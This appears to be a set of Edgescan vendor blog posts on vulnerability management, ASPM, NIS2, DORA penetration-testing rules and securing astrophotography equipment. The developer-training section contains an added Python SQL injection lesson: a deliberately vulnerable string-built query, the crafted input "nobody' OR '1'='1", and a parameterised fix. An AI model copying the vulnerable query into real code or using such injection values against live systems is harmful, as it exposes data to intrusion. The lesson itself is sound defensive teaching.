- Easy deployment. Install the image into your chosen hypervisor (on-prem or cloud), add one firewall rule, and you're done: Edgescan starts discovery and testing. Segregated networks based on geo-lock? Easy: use 2, 3 or 10 appliances, which is easier than 150,000 agents.
- Authenticated scans. There are some misconceptions that agents are required for authenticated scanning. Authentication is configured in the scanning technology. Having cloud-based visibility here means Edgescan will notify clients automatically if there is a problem with authentication.
- Scalability. Again, as your network grows there is no need to install anything. Just add the target to Edgescan or let it be collected automatically.
- No 3rd-party updates... that turn your PCs into bricks.

In summary, agents are becoming a legacy product. The value gained from them is minimal and is quickly being fulfilled by preinstalled solutions such as MS Defender.
Agentless solutions provide many advantages with few drawbacks. As we move towards DORA and harder enforcement of compliance in general, do you really have time to waste installing and maintaining agents while trying to run continual testing along with the 1,000 other tasks that need to be performed?

### Edgescan and ASPM (Application Security Posture Management)

Application Security Posture Management (ASPM) continuously assesses, manages, and enhances application security throughout the software development lifecycle, integrating various security approaches. Below are the typical key outputs of any ASPM solution and how Edgescan maps to and surpasses these requirements.

#### Key Outputs Any ASPM Solution Should Deliver

- Vulnerability Reports: Detailed reports on identified vulnerabilities, including their severity, potential impact, and recommended remediation steps.
  Edgescan provides these and more, such as attack surface, SLA violations, MTTR, prioritization and training recommendations that may prevent such vulnerabilities from being introduced in the first place.
- Compliance Reports: Assessments of how well applications adhere to security policies and regulatory requirements.
  Edgescan provides PCI-DSS, CISA and CIS compliance mapping. Edgescan's AI Insights also map discovered vulnerabilities to compliance standards, framing how each vulnerability will affect compliance efforts.
- Risk Scores: Quantitative scores that represent the overall security risk of an application based on identified vulnerabilities and their potential impact.
  Edgescan provides both breach and risk metrics, such as EPSS, CISA KEV, CVSS and EXF, to help prioritize remediation efforts.
- Security Posture Dashboards: Visual dashboards that provide an at-a-glance view of the security status of all applications within the organization.
  Edgescan provides "Asset Risk" metrics highlighting full-stack security posture information to help focus on the assets with the most severe exposures.
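As an added example (not Edgescan's code), here is how two of the remediation outputs listed above, MTTR and SLA violations, fall out of the two dates the page describes, date discovered and date closed; the per-severity SLA targets, the sample findings and the reporting date are all constructed for illustration.

```python
"""MTTR and SLA-violation reporting from discovery and closure dates.

Added example, not Edgescan's code. It shows how the remediation metrics an
ASPM report should carry follow from two dates per finding: when it was
discovered and when a retest confirmed it closed. SLA targets, sample
findings and the reporting date are constructed for illustration.
"""
from dataclasses import dataclass
from datetime import date
from statistics import mean
from typing import Dict, List, Optional

# Assumed remediation SLA per severity, in days from discovery.
SLA_DAYS: Dict[str, int] = {"critical": 7, "high": 30, "medium": 90, "low": 180}


@dataclass(frozen=True)
class Finding:
    finding_id: str
    asset: str
    severity: str
    discovered: date
    closed: Optional[date] = None  # None until a retest confirms remediation

    def age_days(self, as_of: date) -> int:
        """Days open: discovery to closure, or to the reporting date if still open."""
        end = self.closed if self.closed is not None else as_of
        return (end - self.discovered).days


def mttr_by_severity(findings: List[Finding]) -> Dict[str, float]:
    """Mean time to remediation in days per severity, over closed findings only.

    Open findings are excluded: their closure date is unknown, and counting
    their current age would understate the true MTTR.
    """
    durations: Dict[str, List[int]] = {}
    for f in findings:
        if f.closed is not None:
            durations.setdefault(f.severity, []).append((f.closed - f.discovered).days)
    return {sev: round(mean(days), 1) for sev, days in durations.items()}


def sla_violations(findings: List[Finding], as_of: date) -> Dict[str, str]:
    """Findings that breached their SLA, mapped to 'closed late' or 'open, overdue'.

    Both kinds matter: a late closure is a historical miss for trend reporting,
    an overdue open finding is what an SLA tracker should be alerting on now.
    """
    breached: Dict[str, str] = {}
    for f in findings:
        if f.age_days(as_of) > SLA_DAYS[f.severity]:
            breached[f.finding_id] = "closed late" if f.closed else "open, overdue"
    return breached


def sla_compliance_rate(findings: List[Finding], as_of: date) -> float:
    """Share of findings (closed or open) still within their SLA, as a percentage."""
    if not findings:
        return 100.0
    within = len(findings) - len(sla_violations(findings, as_of))
    return round(100.0 * within / len(findings), 1)


# Constructed reporting snapshot.
AS_OF = date(2024, 10, 1)
SAMPLE_FINDINGS = [
    Finding("F-1", "app-portal", "critical", date(2024, 9, 1), date(2024, 9, 5)),   # 4 days
    Finding("F-2", "app-portal", "critical", date(2024, 9, 1), date(2024, 9, 15)),  # 14 days, late
    Finding("F-3", "api-gateway", "high", date(2024, 8, 1), date(2024, 8, 21)),     # 20 days
    Finding("F-4", "api-gateway", "high", date(2024, 8, 20)),                       # open 42 days
    Finding("F-5", "db-host", "medium", date(2024, 9, 20)),                         # open 11 days
]

if __name__ == "__main__":
    print("MTTR by severity:", mttr_by_severity(SAMPLE_FINDINGS))
    print("SLA violations:", sla_violations(SAMPLE_FINDINGS, AS_OF))
    print(f"SLA compliance: {sla_compliance_rate(SAMPLE_FINDINGS, AS_OF)}%")
```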
#### Key Metrics Any ASPM Solution Should Deliver

- Number of Vulnerabilities: The total count of vulnerabilities identified in the application, business unit or geography. Tagging of assets and application of contextual metadata aid filtering and reporting. ✓ Feature in Edgescan
- Vulnerability Severity: Classification of vulnerabilities based on their severity (e.g., critical, high, medium, low). Severity can be judged not only by the vulnerability type but by its exploitability and breach probability. ✓ Feature in Edgescan
- Time to Remediation: The average time taken to fix identified vulnerabilities, derived from the date discovered and the date closed via on-demand retesting that verifies the vulnerability has been mitigated. Self-imposed SLAs keep track of MTTR and help address severe exposures fast. ✓ Feature in Edgescan
- Compliance Score: A metric indicating the degree to which applications comply with security policies and standards. Edgescan uses AI Insights to achieve compliance mapping, keeping pace with both the ever-changing vulnerability taxonomy and compliance requirements. ✓ Feature in Edgescan
- Risk Exposure: The potential risk exposure based on the identified vulnerabilities and their severity. As above, breach predictability and public knowledge of breach attempts or ransomware leveraging a specific vulnerability can be gleaned via the Edgescan platform. ✓ Feature in Edgescan
- Patch Management Efficiency: Metrics related to the efficiency and timeliness of applying security patches. Self-imposed SLA trackers can notify and alert when exposures are not attended to in a timely manner. ✓ Feature in Edgescan
- Security Posture Trends: Trends over time showing improvements or declines in the security posture of applications. Dashboard metrics and reporting demonstrate risk posture, improvements or otherwise.
  AI Insights provide more context in terms of MTTR, priority and compliance issues. ✓ Feature in Edgescan

The outputs and metrics above help organizations maintain a strong security posture by providing continuous visibility into the security status of their networks, APIs and applications, and by enabling proactive management of security. Don't disregard continuous landscape visibility with ASM, which helps ensure that all assets are under management by the ASPM solution.

### AI Insights: The Cyber Remediation Force Multiplier

Cyber threats are growing in sophistication and volume, making it increasingly difficult to prioritize vulnerabilities, maintain compliance, and ensure the safety of digital assets. The traditional methods of handling these risks are no longer sufficient. AI Insights is a feature designed to provide targeted, actionable intelligence, empowering security staff to make informed, strategic decisions faster than ever.

AI Insights takes non-identifiable customer metadata, combines it with predefined questions, instructions and guardrails, and feeds it into an AI model that produces in-depth, actionable security insights.
This technique lets Edgescan use your specific data to generate tailored Insights, offering a unique perspective on your organization's security posture.

Here's a look at some of the categories of Insight that we can produce:

- Anomaly Detection: By analyzing patterns in your data, AI Insights can flag deviations from typical behavior, for example previously repaired vulnerabilities resurfacing, or assets becoming blocked due to configuration or licensing issues.
- Trend Identification: Looking beyond singular events, we can identify long-term trends in your security data, whether it's the rise of new vulnerability types or shifting patterns in attempted attacks.
- Categorization and Prioritization: The ability to classify data into distinct categories (for example, using a prioritization methodology like Stakeholder-Specific Vulnerability Categorization (SSVC)) and prioritize based on criticality. This allows organizations to tackle the most dangerous threats first.
- Natural Language Summaries: Often, cybersecurity insights are filled with dense technical jargon. AI Insights can distill these details into natural language, making complex security data comprehensible to both technical teams and decision-makers.
- Predictive Capabilities: Leveraging historical data, AI Insights can predict the time it typically takes to remediate certain vulnerabilities, or identify cyclical issues such as configurations that frequently lead to expired credentials or outdated software.
- Checking for Exploit Code: The platform goes beyond just identifying vulnerabilities by assessing whether known exploits are available in the wild, adding a critical extra layer of confidence to your remediation approach.
- Outlier Detection: By filtering through mountains of data, AI Insights can pinpoint outlying data points that may represent either a significant security risk or an opportunity for optimization.
  An example here would be one of a set of assets that previously had a similar attack surface starting to deviate from the others.
- Recommendations: Given your organization's security weak spots, Insights can make recommendations, for example areas to target for training in your team, or areas of concern for certification compliance.
- Strategic Guidance: AI Insights can bridge the gap between technical findings and high-level strategies by converting detailed security data into actionable steps, aligning technical actions with business goals.

AI Insights is more than just a feature; it's a force multiplier for modern cybersecurity teams, helping organizations stay ahead of the curve. As the digital landscape continues to evolve, so too must the strategies we use to protect our organizations. AI Insights is the next step in proactive, intelligent threat management.

### The Intersection of Astrophotography and Cybersecurity: Protecting Your Gear, Software, and Data

Astrophotography depends on advanced technology: high-end cameras, telescopes, and image-processing software. With that reliance comes a common yet often overlooked risk: cybersecurity vulnerabilities.

In the rush to capture celestial wonders, it's easy to forget that the smart devices and software we use to enhance our photography are also susceptible to cyberattacks. As astrophotography becomes more interconnected (especially through internet-enabled equipment, cloud services, and automation), photographers should be mindful of the cybersecurity risks involved. Let's look at how cybersecurity relates to astrophotography and ways to safeguard your equipment, software, and data.

#### Vulnerabilities in Popular Astrophotography Software

Astrophotography software like DeepSkyStacker and PixInsight is essential for processing and stacking images to reveal details hidden in the night sky. Both programs, like any software, can have vulnerabilities.
For example, DeepSkyStacker may require significant computational power and sometimes cloud storage; if that storage is not properly secured, it could expose your data to attackers. Downloading plugins or add-ons from unverified sources could lead to malware infections or unauthorized access to your system. Running outdated versions of any software, including PixInsight, could leave your system open to attackers who could compromise your image data or corrupt your files.

Automation in astrophotography also introduces risk. For instance, ASCOM drivers are commonly used to automate telescope control. Drivers that are outdated or misconfigured could allow unauthorized access to your system, leaving your equipment open to remote manipulation. Tools like NINA (Nighttime Imaging 'N' Astronomy) can also present risks if network connections or remote access configurations are not secured.

#### Securing Remote Observatories and Networked Equipment

Astrophotographers are using cutting-edge technology to capture stunning celestial photos from a distance. However, this digital revolution also comes with new risks. For instance, the ZWO ASIAIR is a game-changing device that enables access to the cosmos. While it has opened up exciting possibilities, it is crucial to secure the equipment. Changing factory-set passwords and using secure connections are vital to keeping your gear safe. Neglecting these standard precautions could see your photo sessions interrupted by bad actors exploiting a vulnerable Wi-Fi setup or easily guessed login details; "Password" is not a good password.

Platforms like QHYCCD's software for QHY cameras, which often involves cloud storage, can be another weak point.
Without proper security features such as two-factor authentication (2FA) or encryption, these systems are vulnerable to unauthorized access, which can result in the theft or manipulation of your imaging data, and no one wants that.

#### Image Processing Tools: A Hidden Cyber Risk

Even the tools astrophotographers use daily, like Adobe Lightroom and Affinity Photo, can carry cybersecurity risks. Attackers have targeted Adobe's products in the past to exploit vulnerabilities and run malicious code. Are you keeping your software up to date? Every missed patch puts your computer at risk. Just imagine your entire photo library being locked by ransomware. Protect your work by making software updates a priority: when you see a notification, take the time to install the latest security fixes. Your photos are worth it.

Did you know that programs like PHD2, which guide telescopes for long-exposure imaging, might seem simple but can still pose security risks if they're part of your networked setup? If remote access tools aren't properly secured, attackers could take control of your equipment or interfere with your imaging sessions.

#### Best Practices for Protecting Your Astrophotography Gear

It is essential to protect your astrophotography tools from cyber threats by adopting strong cybersecurity practices. Here are a few key steps you can take:

- Keep Software and Firmware Updated: Always install updates for your astrophotography software, camera, and telescope firmware as soon as they become available; these updates often include critical security patches.
- Use Strong Passwords and Enable 2FA: Change default passwords on all devices, including remote observatories, telescopes, and cameras.
  Enable two-factor authentication (2FA) whenever possible to add an extra layer of security.
- Secure Network Connections: When using cloud services or remotely accessing your equipment, use encrypted connections (such as VPNs) to protect your data from being intercepted.
- Download from Trusted Sources: Only download software, plugins, or updates from reputable sources to avoid inadvertently installing malware or compromised code.
- Conduct Regular Security Audits: Periodically audit your astrophotography setup, checking for outdated software, weak network configurations, and other potential security gaps.

Understanding the link between astrophotography and cybersecurity helps make sure the technology you rely on to capture the universe stays secure. By safeguarding your equipment and data, you can focus on the stars without worrying about digital threats.

### What is the NIS2 Directive?

The NIS2 Directive is comprehensive legislation designed to significantly enhance the EU's cybersecurity framework. Its main goal is to strengthen the cybersecurity defences of critical infrastructure and essential services that rely on network and information systems. Building on the lessons of the original NIS Directive (2016), NIS2 broadens its focus to confront modern cyber threats and tackle emerging challenges.
It specifically addresses the rapid advancements in cloud computing, supply chain security, and digital services, ensuring a more resilient and secure digital environment across the EU.

#### Where Does NIS2 Apply?

NIS2 not only expands coverage within existing sectors (e.g., adding insurance companies to financial services, and expanding energy to include district heating and cooling) but also introduces entirely new sectors such as postal services, waste management, and food production.

Here’s a breakdown of the sectors affected by the original NIS Directive compared to those included in NIS2, and the changes that have been introduced:

#### What are the Requirements?

What needs to be done to comply with NIS2? To strengthen Europe's defences against cyber threats, the NIS2 Directive introduces new obligations in four key areas: risk management, business continuity, reporting obligations and corporate accountability.

- Risk Management: Organizations must enforce robust measures such as incident response plans, supply chain security, network protection, stronger access control, and encryption to combat cyber threats.
- Business Continuity: Entities are required to ensure operational resilience, with plans for system recovery, crisis response, and emergency procedures during cyber incidents.
- Reporting Obligations: Essential and important entities must report major security incidents swiftly, including a mandatory 24-hour “early warning” for significant events.
- Corporate Accountability: NIS2 holds senior management directly accountable for cybersecurity, with penalties and personal liability for non-compliance.

#### 10 Baseline Security Measures

In addition to the four key areas detailed above, NIS2 also mandates 10 minimum security measures that essential and important entities must implement to counter common cyber threats:

1. Conduct risk assessments and establish security policies for information systems.
2. Implement policies to evaluate the effectiveness of security measures.
3. Use cryptography and encryption where relevant.
4. Create a plan for managing security incidents.
5. Secure the procurement, development, and operation of systems, including vulnerability handling.
6. Provide cybersecurity training and ensure basic computer hygiene.
7. Establish strict data access controls and track asset usage.
8. Ensure up-to-date backups and maintain system access during incidents.
9. Use multi-factor authentication, encryption for communications, and continuous authentication.
10. Strengthen supply chain security by assessing supplier vulnerabilities and adopting appropriate security measures.

#### How Can Edgescan Help with NIS2 Compliance?

Edgescan, a leading provider of full-stack vulnerability management and penetration testing solutions, is perfectly positioned to assist organizations in achieving NIS2 compliance. Here’s how:

1. Continuous Vulnerability Assessment: Edgescan provides continuous vulnerability scanning and assessment across both network infrastructure and application layers. This aligns with NIS2's requirement for organizations to regularly assess and mitigate risks.
2. Risk-Based Prioritization: One of the key elements of NIS2 is risk management. Edgescan delivers a risk-based approach to vulnerability management by prioritizing vulnerabilities based on criticality, exploitability, and the business impact they might have.
3. Full-Stack Security: From web applications to network infrastructure, Edgescan covers the entire IT environment, providing a comprehensive overview of all potential attack surfaces. This is crucial for NIS2 compliance, which requires organizations to ensure the security of both their digital and physical systems.
4. Expert-Led Penetration Testing: Edgescan offers hybrid vulnerability management and expert-led penetration testing services, helping organizations uncover hidden vulnerabilities that automated scans might miss. This ensures a thorough assessment and meets the higher security standards demanded by NIS2.
5. Compliance & Reporting Tools: Edgescan provides detailed reports that can assist organizations in demonstrating compliance with NIS2 during audits. These reports are essential for tracking progress and risk mitigation actions.

### The Power of Edgescan’s Validated Vulnerability Stream for Focused, Problem-Based Development Training

When it comes to security training for developers, one size doesn’t fit all. You can send your teams to generic secure coding courses or throw random security guidelines at them, but is that really going to stick? Most developers I know are pragmatic problem-solvers. They thrive when you give them real, tangible issues to fix, not abstract rules to follow. And that’s where Edgescan’s validated vulnerability stream comes in—it turns security from theory into practice.

#### The Problem with Generic Security Training

Let’s face it: traditional security training is often a bit of a grind. Developers sit through hours of presentations, learning about a long list of security vulnerabilities that may or may not be relevant to what they’re building. Sure, they might retain some of that information, but how much of it translates into their daily coding habits? When you bombard developers with a laundry list of potential threats, they don’t have the time or the context to apply that knowledge directly. In the fast-moving world of software development, training needs to be specific, problem-based, and integrated into the development cycle. Otherwise, it’s just noise.
#### Edgescan’s Validated Vulnerability Stream: Real-World Problems in Real Time

Edgescan’s validated vulnerability stream is a game-changer because it delivers actual, verified security vulnerabilities that are impacting your own systems, in real time. This is not some hypothetical security lesson; these are vulnerabilities you need to fix. The beauty of the Edgescan platform is its hybrid approach: vulnerabilities are identified through automated scanning, but then they’re validated by human experts before being sent to your team. That means developers aren’t wasting time chasing false positives or irrelevant issues. Every vulnerability in the stream is actionable, real, and relevant to your environment.

This stream of validated vulnerabilities gives you a continuous, targeted feed of the exact problems that are affecting your codebase right now. And that’s where the opportunity for focused, problem-based development training comes in.

#### Focused Training: Turning Vulnerabilities into Learning Opportunities

Imagine using this validated vulnerability stream to guide your development training efforts. Instead of generic lectures, you’re focusing on the exact security problems your team needs to address. You can structure training sessions around real-world issues that are specific to your applications, whether it’s an injection flaw, a misconfigured API, or an insecure file upload mechanism. Here’s how you can use the Edgescan stream for problem-based development training:

- Contextual Learning: Instead of teaching SQL injection in the abstract, walk through a SQL injection vulnerability that was discovered in your system. Show the team how it was identified, how it can be exploited, and—most importantly—how to fix it. This turns security from an academic exercise into a real-world problem-solving challenge.
- Immediate Feedback: With Edgescan’s continuous stream, you can integrate security feedback into your development process. As vulnerabilities are discovered and remediated, you can use them to reinforce secure coding practices on the spot. Developers see the impact of their work in real time, which reinforces learning far better than a one-off training session.
- Focused Skill Development: Every developer or team has their strengths and weaknesses. The Edgescan stream allows you to identify areas where specific developers need more training. If a particular team struggles with API security, you can focus your training on the vulnerabilities discovered in that area. This helps build targeted expertise, rather than overwhelming the team with a broad spectrum of security concerns.
- Closing the Knowledge Gap: In many organizations, there’s a gap between security teams and development teams. Security folks find vulnerabilities, but developers are often left to figure out the fix on their own. The validated vulnerability stream bridges that gap. Security and development teams can collaborate on resolving these issues, using them as a basis for shared learning and better communication across departments.
- Tailored Training for Specific Technologies: Edgescan’s vulnerability insights are specific to the technologies you’re using. If your team is heavily invested in microservices, API security flaws might be more relevant. If you’re working in a legacy system, you might focus on patching out-of-date dependencies. By honing in on the actual technologies and frameworks in your stack, training becomes practical and directly applicable to your daily work.

#### Creating a Culture of Continuous Learning

What excites me about this approach is that it turns security into an ongoing, iterative process. Edgescan’s validated vulnerability stream isn’t a one-off event. It’s a living, breathing resource that evolves with your codebase and development practices. You’re not just securing your system; you’re actively training your developers with each new vulnerability that arises.
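As an added illustration of the kind of contextual lesson described under "Contextual Learning" above (walking a team through a SQL injection finding, what the flaw does, and how to fix it), here is a self-contained before-and-after walk-through. This is example code written for this page, not code from Edgescan or the original post; the user lookup, the in-memory SQLite store and the sample rows are all constructed assumptions.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory SQLite table standing in for an
    application's user store (an assumption made for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # The flaw: the caller-supplied value is pasted into the SQL text, so the
    # input can change the structure of the query instead of being a literal.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]


def find_user_fixed(conn: sqlite3.Connection, username: str) -> list:
    # The fix: a parameterised query. The driver binds the value separately
    # from the SQL text, so quotes and keywords in the input remain data.
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def demo() -> dict:
    """Run both lookups against a benign input and the classic quote-breaking
    input, and return which rows each query matched so the contrast is
    visible side by side."""
    conn = build_db()
    benign = "alice"
    crafted = "nobody' OR '1'='1"
    return {
        "vulnerable_benign": find_user_vulnerable(conn, benign),
        "vulnerable_crafted": find_user_vulnerable(conn, crafted),
        "fixed_benign": find_user_fixed(conn, benign),
        "fixed_crafted": find_user_fixed(conn, crafted),
    }


if __name__ == "__main__":
    for name, matched in demo().items():
        print(f"{name}: {matched}")
```

Run as a script, it prints what each lookup matched: the crafted value returns every user from the string-built query and nothing from the parameterised one, which is the concrete before-and-after contrast a training session can be built around. The same binding pattern applies to any database driver that supports placeholders; the remediation lesson is to never compose SQL text from untrusted input.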
This creates a culture of continuous learning. Developers aren’t being sent to training sessions once a year—they’re getting security feedback embedded directly into their workflow. And because the vulnerabilities are real and relevant, the lessons learned stick far more effectively than they would in a traditional classroom setting.

#### The Path Forward

We all know security isn’t static. The threats evolve, the code evolves, and training needs to evolve along with it. By leveraging Edgescan’s validated vulnerability stream, you can build a dynamic, focused training program that’s driven by the real-world issues your developers are already facing. It’s the perfect marriage of proactive security management and hands-on learning. Your developers aren’t just coding defensively—they’re building secure habits from the ground up, guided by real-time, validated vulnerabilities that matter to your business.

That’s how we take developer security training from theory to practice—from broad lessons to focused, problem-based learning. And that’s how we create a more secure development culture that doesn’t just patch vulnerabilities but actively learns from them.

### How Edgescan Can Bolster Your Bug Bounty Program: Depth Meets Breadth and Frequency

As someone deeply involved in security, I’ve seen firsthand how bug bounty programs can provide incredible insights into the depth of application security. Crowdsourced vulnerability hunting, when done right, can uncover highly complex and obscure issues that traditional methods may miss. But relying solely on bug bounty programs also has limitations, especially when it comes to comprehensive coverage and maintaining a consistent security posture.
This is where the synergy between bug bounty programs and continuous vulnerability management solutions like Edgescan really shines.

#### Bug Bounty for Depth: The Power of Focused Expertise

Bug bounty programs excel at finding the tricky, hard-to-spot vulnerabilities that require creative thinking and deep technical expertise. Talented researchers from all over the world will test your applications, often using unconventional approaches that can catch even the best internal security teams off guard. For example, they might discover a business logic flaw buried deep in a multi-step transaction flow or an obscure deserialization vulnerability tucked away in an API.

However, bug bounties are essentially snapshots in time, reactive by nature, and dependent on what the bounty hunters choose to test. They typically aren’t optimized for providing ongoing, exhaustive security coverage across an entire attack surface—especially at the speed of continuous development cycles.

#### Edgescan for Breadth and Frequency: Continuous Coverage at Scale

This is where Edgescan comes in. Edgescan doesn’t aim to replace bug bounty programs; instead, it complements them by covering the breadth and providing ongoing, real-time vulnerability management across your entire infrastructure. Whereas a bug bounty may dig deep into a specific component or application, Edgescan excels at providing broad, continuous visibility into your web applications, APIs, and networks. It’s always on, ensuring that nothing slips through the cracks between bounty submissions.

One of the most significant advantages of Edgescan is its combination of automated vulnerability scanning with human validation. The platform continuously monitors your assets, scanning for a wide range of vulnerabilities, including those that may emerge as new CVEs are discovered or as your applications evolve. Importantly, each identified vulnerability is reviewed by security experts before being presented to your team, ensuring accuracy and removing the noise of false positives.

This automated yet human-validated approach delivers frequent and thorough security checks—something that can be particularly difficult to achieve with a bug bounty program alone.

#### Combining the Best of Both Worlds: Depth Meets Breadth

When you integrate Edgescan with your bug bounty program, you get the best of both worlds. Bug bounty programs provide the deep dives needed to uncover complex, high-impact issues, while Edgescan ensures ongoing, comprehensive coverage across your entire attack surface. With Edgescan constantly monitoring and validating vulnerabilities, you can be confident that the more mundane, yet critical, security tasks are handled without over-reliance on sporadic bounty submissions.

In fact, many organizations find that Edgescan’s continuous assessment actually enhances their bug bounty program. By proactively identifying and resolving the more straightforward vulnerabilities, Edgescan allows bounty hunters to focus on digging deeper, finding those truly high-value bugs that can have the most significant impact. Essentially, Edgescan frees up your bug bounty program to do what it does best—specialized, targeted, deep-dive security testing.

#### Conclusion: A Holistic Approach to Security

In today’s fast-paced digital landscape, security needs to be both proactive and reactive. Bug bounty programs and continuous vulnerability management don’t have to be in competition—they can and should work together. Edgescan’s breadth and frequency fill the gaps left by a bug bounty’s depth, providing a holistic approach to security that maximizes coverage and minimizes risk.

By leveraging Edgescan to handle the day-to-day security management and letting bug bounty hunters focus on digging into the tricky vulnerabilities, you’re building a more resilient, effective security posture. It’s not about choosing one over the other; it’s about combining their strengths to ensure you’re covered from every angle.

So, if you’re running a bug bounty program or thinking about starting one, consider how Edgescan can bolster your efforts. Security is a journey, not a destination, and the best way to stay secure is to combine depth, breadth, and frequency in one cohesive strategy.

### Digital Operational Resilience Act (DORA) and Penetration Testing: An Overview by Edgescan

#### Introduction

The Digital Operational Resilience Act (DORA) was introduced across EU nations to address risk management gaps and to harmonise these requirements across the EU. The act specifically targets financial service entities, i.e. largely those regulated by central banks, and introduces rules around incident management and reporting, digital testing and management of third-party risk.

This document discusses the practical implications of DORA and what it means for your organisation, with a particular focus on one key element: Digital Operational Resilience Testing. This is the piece that includes requirements for establishing ongoing testing programmes.

#### What is DORA?

DORA (EU Regulation 2022/2554) was adopted by the European Council in November 2022 and will be in full force from 17th January 2025. DORA is an EU regulation that comprehensively addresses ICT risk management in the financial sector by ensuring that all providers follow a set of standards to mitigate ICT risks to their operations. Prior to DORA, different countries had different regulations and requirements when it came to ICT risk, whereas DORA aims to create a single framework that all EU member states will have to follow.

After DORA's initial release, several clarifications on its practical implementation have been sought. Given this uncertainty about the legislation's day-to-day elements, various European authorities have produced a number of technical documents.
The first batch of these was released in January 2024, in the form of three Regulatory Technical Standards (RTS) and one Implementing Technical Standard (ITS). These documents do not contain any information on resilience testing and focus on other key DORA areas.

Five additional technical documents were published in July 2024. This set of documents included the much-anticipated “RTS on Threat Led Penetration Testing (TLPT)” (linked in references), which clarifies many aspects of resilience testing.

#### Who does DORA apply to?

DORA applies not only to traditional banks but also to other financial entities and to ICT third parties that provide ICT-related services to financial institutions, such as cloud platforms or data analytics services.

Affected entities include traditional financial institutions, credit and payment institutions, investment firms and funds, crypto-asset providers, data reporting service providers, insurance companies and ancillary service providers, pension providers, auditors, and some ICT third-party service providers.

#### Does DORA apply to US companies?

As DORA is a regulation of the European Union, it only applies to organisations within the EU. So, strictly speaking, it does not apply to US companies. However, any US firms with legal entities operating out of the EU that meet the scope requirements above will be subject to its effects.

#### DORA vs NIS2

Another similar directive, which will become law across the EU in October 2024, is the Network & Information Security 2 (NIS2) directive. This directive is aimed at a wider range of organisations and attempts to harmonise broader levels of cyber security in the EU.

DORA is specifically focused on the financial services sector and will take precedence over any overlapping regulatory texts such as NIS2.

While similar, their purposes differ—DORA protects the financial sector, while NIS2 creates a cyber security baseline across a broader set of industries.
#### DORA Key Elements

DORA really breaks down into six crucial elements, as summarised below:

- ICT Risk Management
- ICT Incident Management & Reporting
- Operational/Security Payment Incident Management & Reporting
- DIGITAL OPERATIONAL RESILIENCE TESTING
- Information & Intelligence Sharing
- ICT Third-Party Risk Management

The pillar ‘Digital Operational Resilience Testing’ is where Edgescan comes into the picture. This element is the focus of the rest of this document.

#### DORA Testing Requirements: Digital Operational Resilience Testing

Digital Operational Resilience Testing is outlined in Articles 24, 25, 26 and 27 of the act, with further clarifications in the RTS on TLPT. The act defines two key requirements: the notion of ‘testing’ and ‘advanced testing’.

#### Testing Scope

The target of these tests is all ICT services that support critical or important functions of financial institutions.

DORA defines a critical or important function as “a function, the disruption of which would materially impair the financial performance of a financial entity, or the soundness or continuity of its services and activities, or the discontinued, defective or failed performance of that function would materially impair the continuing compliance of a financial entity with the conditions and obligations of its authorisation, or with its other obligations under applicable financial services law.”

#### Requirement 1: Resilience Testing

| | |
|---|---|
| Goal | Improve security posture and thus organisational resilience |
| Scope | Critical and important applications, systems and infrastructure |
| Frequency | At least annually, ongoing or before deployments |
| Testers | Internal or external |

As part of the ICT risk management framework, DORA requires that financial entities define, document and maintain a thorough and comprehensive digital operational resilience testing programme. Financial entities will need to ensure that appropriate tests are conducted on all ICT systems and applications supporting critical or important functions, and must do so on at least a yearly basis.

Some of the testing types that are detailed include:

- Penetration Testing: Regular (at least annual) testing of applications, APIs and infrastructure.
- Vulnerability Assessments: Performing regular vulnerability scanning of networks and applications. Testing should also be carried out before any deployment/redeployment of new or existing applications or infrastructure components that support critical or important functions.
- Source Code Reviews: Source code reviews are undertaken regularly for critical or important systems.
- Objective-based penetration testing: Akin to Red Teaming, a more focused penetration test, usually comprising a wider range of systems, but with objectives defined in advance (i.e. flags).

Organisations will need to:

- Demonstrate that they are conducting an appropriate set of security testing on critical and important systems and applications at least annually.
- ‘Fully address’ any vulnerabilities identified by this testing.

There are still some elements of ambiguity in the above requirements, such as what defines an appropriate set of testing. Organisations will need to work closely with their authorities to ensure the right level of testing is established on the correct set of systems.

Edgescan Insight: Penetration testing and vulnerability management is core to what we do at Edgescan. We deliver thousands of assessments every year to Fortune 100 clients globally in the EU and the USA.
We have a wide range of licensing available which covers continuous security testing and exposure management (for applications and networks), working up to more rigorous penetration testing licences (Penetration Testing as a Service). Additionally, objective-based penetration testing (aka red teaming) and source code reviews are capabilities that we have been exercising for over 10 years, since 2011.

#### Requirement 2: Threat-Led Penetration Testing (TLPT)

Article 26 of DORA sets out expectations in relation to the advanced testing of ICT tools, systems and processes, by way of the Threat Led Penetration Test (TLPT).

| | |
|---|---|
| Goal | Validate the effectiveness of the ongoing resilience testing programme |
| Scope | Organisation-wide: people, processes, technology |
| Frequency | Every three years |
| Testers | Internal (with some caveats) or external |

Designated significant entities (see below) must conduct a Threat-Led Penetration Test (TLPT) at least once every three years. The goal is to validate the effectiveness of the ongoing resilience testing that each organisation is conducting. As this is a three-year requirement, it is likely that the first of these tests will not take place until closer to or during 2027. The TLPT framework being used is largely based on the TIBER-EU framework for red teaming; however, a number of modifications have been made.

#### What is a TLPT?

Conventional penetration tests provide a detailed assessment of technical and configuration vulnerabilities and are usually focused on a single system or environment in isolation. A TLPT is more akin to a traditional (albeit much larger) red team test, which focuses on the entire organisational entity, including its people, processes and technologies. Additionally, a TLPT is ‘intelligence-led’, which means that the testing team works closely with a Threat Intelligence provider to establish a set of testing scenarios based on known current attacks and industry-specific attacks.

#### TLPT Authority

Each EU member state will designate an authority charged with all tasks and responsibilities related to TLPTs conducted in that state. The TLPT Authority will work with each organisation proactively, identifying those who must undergo a TLPT, initiating the testing process, confirming the scope of testing, confirming reporting requirements and ultimately signing off on the work completed.

Even though these Authorities are working from the same set of legislation, there will nonetheless likely be small differences in how TLPTs are carried out in each state.

#### Criteria – Significant Entities

The technical standards recognise that TLPT will apply to certain organisations based on ICT maturity and the overall importance of that entity. The following areas will be factors in that decision:

- Impact-related factors: to what extent a disruption of the financial entity would impact the financial sector.
- Possible financial stability concerns: for example, the systemic character of the financial entity at EU or national level.
- Specific ICT risk profile: the level of ICT maturity of the financial entity or the technology features involved.

